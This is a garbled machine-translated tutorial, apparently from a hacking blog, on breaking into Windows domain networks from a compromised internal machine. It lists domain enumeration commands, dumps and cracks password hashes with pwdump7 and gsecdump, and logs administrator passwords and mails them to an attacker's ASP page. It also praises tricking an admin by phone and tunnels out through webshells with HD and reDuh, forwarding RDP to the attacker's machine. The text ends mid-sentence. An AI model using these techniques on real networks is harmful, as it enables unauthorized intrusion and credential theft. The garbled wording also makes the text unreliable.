Penetration in the domain environment

Intranet penetration, especially in a relatively large network environment, is likely to encounter a special network environment such as domain, intranet penetration in the domain environment will be another day.
First, let's take a brief look at the concept of the domain:
A Domain is an independent unit running on a Windows network. To access each other, You must establish a Trust relationship (Trust Relation ). A trust relationship is a bridge between a domain and a domain. After a domain has established a Trust Relationship with other domains, the two domains can not only manage each other as needed, but also allocate device resources such as files and printers across the network, allows you to share and manage network resources between different domains.
A domain is not only a logical organizational unit of a Windows network operating system, but also a logical organizational unit of the Internet. In a Windows network operating system, a domain is a security boundary. The domain administrator can only manage the domain. Only when other domains explicitly grant management permissions to others can the domain administrator access or manage other domains. Each domain has its own security policy, and its security trust relationship with other domains.

Through the above understanding, we can know that the permissions of the domain administrator are quite large, and the domain administrator can remotely manage various computers in the domain by holding the domain login ticket, you have the permission to log on to any machine. In the process of penetration, we can record the Administrator Login Password in some way. Of course, this is just one of the ideas.

After obtaining a zombie from the Intranet or in the domain, first check the current network environment and execute:

Net view to obtain a series of host names, and you can Ping their machine names to obtain their IP addresses. However, note that the listed machine names are only related to the network structure, not necessarily in the same Intranet or domain.
Run

Ipconfig/all to check whether the domain environment exists. If yes, run the following command:

Net user/domain to view which users are in the domain and which computers are in the specified domain:

Net view/domain: testdomain (testdomain is assumed to be one of the target domains) to view the administrator user in the domain, you can execute:

Net group "domain admins"/domain can also be run through the command:

Net user domain-admin/domain to view the Administrator Logon Time, password expiration time, logon script, group allocation, and other information.
Generally, it is better to master more network information before the official attack. You can retrieve possible privacy information by traversing the Administrator's file. The more information, the better. The second is to capture the hash value of the local machine, here we can use a tool: pwdump7.exe
It is very easy to use this command to capture the hash. You can directly execute the command line. The command to export the hash to text is:

Pwdump7.exe> 1.txt can be cracked by tools such as lc5, rainbowcrack, saminside, and ophcrack after hash is obtained, if you are lucky enough, you can use this password to try to log on to other machines on the Intranet. Of course, if you have a high permission, you have to be lucky. Here we also introduce another powerful tool in domain penetration: gsecdump
The advantage is that files can be stored from the domain server password

Tool for exporting hash of all domain users in windowstdstds. dit and exporting hash from the active process. In addition, as long as there is a local administrator permission to use hash injection to open the domain administrator process, facilitating domain penetration. Let's look at the things in the command line to see how to use them.
You can also obtain information by logging the domain administrator to log on to the host password. Here we use a small tool: Winlogon
You can intercept the password for logging on to the local machine 3389, and of course you can intercept the password for logging on to the local machine by the domain administrator. It may take a long wait for the domain administrator to log on to the machine, maybe the Administrator has a fixed period to perform routine login checks, or you can make a lie to cheat the domain administrator's login, in the past, a buddy impersonates a server administrator and calls the domain administrator. He lied that the server was infected with viruses and could not be cleared. He asked the domain administrator to log in before he thought about the virus. The results can be imagined, the password is recorded successfully! Of course, more methods are based on your own ideas.
Since Winlogon can only record passwords on the local machine, because it does not know when the Administrator will log in, we can use the Asp Mail version modified on the Internet, directly send the intercepted user name and password to your Asp email address. However, it seems that it only applies to Win2003 systems.
The usage is as follows: Run Loader.exe to enter your own email address, CreateServer.exe will be generated, Asp will be uploaded to the server, and then the password recorder will be run on the zombie, post. asp will generate key.txt under your urladdress.

Preparations have come to an end, and then we can start the formal penetration.
Generally, some machines with weak passwords or overflow opportunities may exist in the Intranet. It is a good idea to overflow, but note that, although the server has been taken down and logged on remotely, not all work must be performed on the login interface, which may be discovered by the administrator or cause other unknown problems, in addition, if the tools are too large to be directly transmitted, You can first use the port forwarding, VPN and other tunneling technologies to port the intrusion environment to the local remote penetration, here you can use several powerful tools:
① Ncph hd (Lcx also works, similar)
This method is applicable when the firewall blocks external links and has two-way Internet connections. Run the following command on the local machine:

Hd-s listen 53 1180 means to forward data from the connected port 53 to port 1180.
Run on Broilers:

Hd-s-connect XX. XX 53 (XX. XX is your own IP address) the local machine can receive the proxy situation that has rebounded. Next, you can set it in SocksCap. Of course, you must first install SocksCap and then set it in the sockets console.

After the connection, you can undo it by hand, and drag tools and the like directly into the console interface.
② ReDuh (stepping stone under Webshell)
It is applicable to webshell and supports aspx, php, and jsp. It can forward Intranet server ports to the local machine through the http/https tunnel to form a connection loop. It is used to connect to the internal port of the target server when the target server has an intranet or port policy. The server is a webshell (for different servers, there are three versions: aspx, php, and jsp). The client is written in java. JDK is recommended for local execution.
After the webshell is uploaded, run the following command:

ReDuhClient target server Domain Name http 80/WEBSHELL path/reDuh. aspx and then connect to port 1010 with NC:

If nc-vv localhost 1010 is successfully connected, a prompt is displayed. Enter the command.

[CreateTunnel] 1234: XX. XX: 3389 (XX. XX is a zombie IP address or domain name)
You can forward the remote port 3389 to port 1234 of the Local Machine. After the channel is established, connect mstsc to the local machine 1234.
In addition, the mongoh GUI version is provided, which can be used without the local JDK installation support.

After all the connections are ready, intrusion can be implemented. There are several common methods:
Overflow:
As mentioned above, the probability of weak passwords and overflow in the Intranet is relatively high, so we can use common overflow techniques for attacks, you can use a port scanner to scan ports of other machines in the intranet and use weak passwords, this success is hard to say. It depends on the situation. Generally, it is a little complicated, because most computers are working with patches, the success rate of overflow is far inferior to that of the previous time, but this is also a method.
Spoofing:
There are many types of spoofing, such as ARP spoofing, DNS spoofing, active and passive session hijacking. The first two can be implemented using powerful Cain. As for the specific usage of Cain, we will not talk much about it. Google will let you know. Session hijacking involves the TCP/IP principle, and due to its main implementation environment in linux, I do not quite understand =. =, so here is a brief introduction.
TCP uses an end-to-end connection. In data transmission, two serial numbers are required:
Field Sequence Number (seq) and validation sequence number (ackseq ).
Seq indicates the sequence number of the data transmitted in this article in the whole data stream to be transmitted by the sending host. ackseq indicates the sequence number of the next eight-bit Group of the host to be received by the sending host, the relationship between the two is:
The seq value in the packet to be sent should be equal to a in the packet it just received